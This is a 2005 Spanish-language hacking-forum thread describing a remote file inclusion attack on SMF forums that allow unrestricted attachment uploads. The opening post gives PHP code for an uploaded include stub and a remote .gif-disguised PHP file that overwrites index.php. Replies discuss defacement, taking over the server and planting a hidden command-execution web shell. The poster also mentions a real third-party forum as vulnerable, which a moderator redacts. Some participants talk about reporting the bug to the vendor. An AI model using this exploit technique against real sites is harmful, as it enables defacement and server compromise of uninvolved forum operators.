elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 22:08  


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Vulnerabilidad en smf (cumpliendo unos requisitos)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Vulnerabilidad en smf (cumpliendo unos requisitos)  (Leído 8,554 veces)
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Vulnerabilidad en smf (cumpliendo unos requisitos)
« en: 3 Octubre 2005, 18:39 »

Hola a todos, en mi afan por descubrir Vulnerabilidades de foros smf he conseguido encontrar una pero tienen que cumplirse los siguientes requisitos para que pueda ser explotada:
-Tener los ficheros adjuntos sin cifrar
-Que todos puedan subir ficheros adjuntos
-Se puedan subir de todos los formatos
Si se cumplen esos requisitos, pues se hace esto. Se sube este archivo preparado de antemano:
Código:
<?php
include($variable);
 ?>
Y luego en tu hosting subes el siguiente fichero php pero terminado en .gif
Código:
<?php
$fo = fopen("./index.php","w+") or die ("no se puede crear!!!");
fwrite($fo,'Prueba, ha saldio bien??');
fclose($fo);
echo 'bien hecho';
 ?>
Y entonces haces uso de la Vulnerabilidad famosísima remote file injection.
Citar
Y usando esto yo he conseguido (yo por lo menos) sobrescribir el index.php de la carpeta attachament, pero me imagino que no será muy dificil cambiar de directorio y sobréscribir otros attachament incluso sobréscribir el index.php principal.
Saludos  ;)
P.D dudas comentarios ayudas para profundizar el bug...
« Última modificación: 3 Octubre 2005, 18:45 por reydelmundo11 » En línea

BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.004


Ver Perfil
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #1 en: 3 Octubre 2005, 18:43 »

Que cosa util podemos sacar de aqui?

Pd: "Prueba" es con B
En línea
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #2 en: 3 Octubre 2005, 18:46 »

Lo he hecho rápido y no me estaba fijando en las faltas de ortografía, pero a lo que vamos...
Podría sacarse algo útil de qui  :o
En línea

Azielito
no es
CoAdmin
***
Desconectado Desconectado

Mensajes: 9.114


>.<


Ver Perfil WWW
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #3 en: 3 Octubre 2005, 19:02 »

Que cosa util podemos sacar de aqui?

Pd: "Prueba" es con B
pues, para empezar puedes buscar algo sobre la vulnerabilidad de RFI

puedes hacerte del servidor :P
En línea

Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #4 en: 3 Octubre 2005, 19:09 »

Se podría hacer un deface.
¿que quieres decir con?
Citar
pues, para empezar puedes buscar algo sobre la vulnerabilidad de RFI

Citar
puedes hacerte del servidor
En línea

sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #5 en: 3 Octubre 2005, 19:19 »

:o interesante..

ya lo mandaste a simplemachines? que a mi mis reportes de bugs siempre me los borran :(

y que
"until the next release of SMF will be reintegred to the forum"

haber si no te hacen lo mismo.

aunque es necesario subir el archivo con terminacion php? que hay algunos que si la subes sin termnacion o con terminacion .php.txt o .php.gif se ejecutan como php aunque sean gif o txt

y segun yo no es necesario poner la variable que incluya del otro hosting..

alomejor se puede directo.. osea crear el prueba.php.gif y en este colocar el fopen, etc..

yo mas bien crearia un archivo escondido, con instrucciones para ejecutar comandos, subir archivos, modificar secuencias SQL, y verlas etc..

ya para acabar.. pruebalo en el foro de prueba de 1,2,3 testing de SMF, ya que "you can do almost anything here"
En línea

Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #6 en: 3 Octubre 2005, 20:05 »

Ahora lo notificaré a smf, posiblemente consiga que sea admitida como vulnerabilidad
En línea

mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #7 en: 3 Octubre 2005, 20:08 »

Ahora lo notificaré a smf, posiblemente consiga que sea admitida como vulnerabilidad

y tu encontraste muchos foros vulnerables q cumplan los requisitos q posteaste????

salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #8 en: 3 Octubre 2005, 20:22 »

Encontré este que creo que los cumple:
******
PROHIBIDO DAR INFORMACIÓN COMPROMETEDORA DE TERCEROS
******
Y lo probé en el mio y también lo cumplen  8)
Saludos  ;)
« Última modificación: 5 Octubre 2005, 03:03 por Morris » En línea

sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #9 en: 4 Octubre 2005, 13:51 »

oyeee no seas tan mala onda.. dejalos que busquen, solo di que has encontrado alguno.

y si te lo admiten como vulnerabilidad te lo borran jaja, o almenos si es peligrosa, y esta definitivamente es peligrosa.. he posteado 3 vulnerabilidades, 2 peligrosas, me borraron 2.. y solo dejaron la de eternal new.. que no es peligrosa para nada.. cuando algun administrador la vea, te va a mandar un mp, y (si es peligrosa) la borrara.
En línea

Ertai
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.026


Ralph Wiggum


Ver Perfil
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #10 en: 4 Octubre 2005, 19:17 »

Vaya ***** de "bug".

Citar
-Se puedan subir de todos los formatos

Si se pueden subir todos los formatos, donde esta la gracia?? Así cualquiera!!

Por cierto... Porque buscas en SMF?? Me lo estoy oliendo... xDDDD
En línea

Si la felicidad se comprara, entonces el dinero sería noble.

Código:
void rotar_by_ref(int& a, int& b) {
   /* Quien dijo que no se podia sin una variable temporal? */
   *a = *a ^ *b;
   *b = *a ^ *b;
   *a = *a ^ *b;
}
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #11 en: 4 Octubre 2005, 19:27 »

Smf es el foro que mas conozco y uso... por lo que es el que mas uso y el que es el mas seguro por eso es todo un reto encontrar algo....
No es que quiera hackear este foro ni nada por el estilo mal pensao  :-\
Saldudos  :)
En línea

sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #12 en: 4 Octubre 2005, 19:43 »

entre otras cosas.. es muy dificil que acepte de todos los formatos, pero como ya dije, depnde del servidor, que hay algunos que php.gif los toma como php

y no por buscar en smf es que quieras hacer algo.. parece ser que debes investigar el signifiaco de hacker, y de auditor de programas.. no siempre se hace para hacer algo malo, se hace para por ejemplo, SMF lo arregle, o lo arregles tu mismo, y tu foro no sea vulnerable si alguien mas lo encuentra
« Última modificación: 4 Octubre 2005, 19:45 por Sirdarckcat » En línea

Morris
Ex-CoAdmin y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.966


Ver Perfil WWW
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #13 en: 5 Octubre 2005, 05:22 »

Está prohibido dar información de terceros. Si este post sigue por mal curso lo borro.
En línea

sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Vulnerabilidad en smf (cumpliendo unos requisitos)
« Respuesta #14 en: 5 Octubre 2005, 13:54 »

oyeee no seas tan mala onda.. dejalos que busquen, solo di que has encontrado alguno.
Está prohibido dar información de terceros. Si este post sigue por mal curso lo borro.
te dije...
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines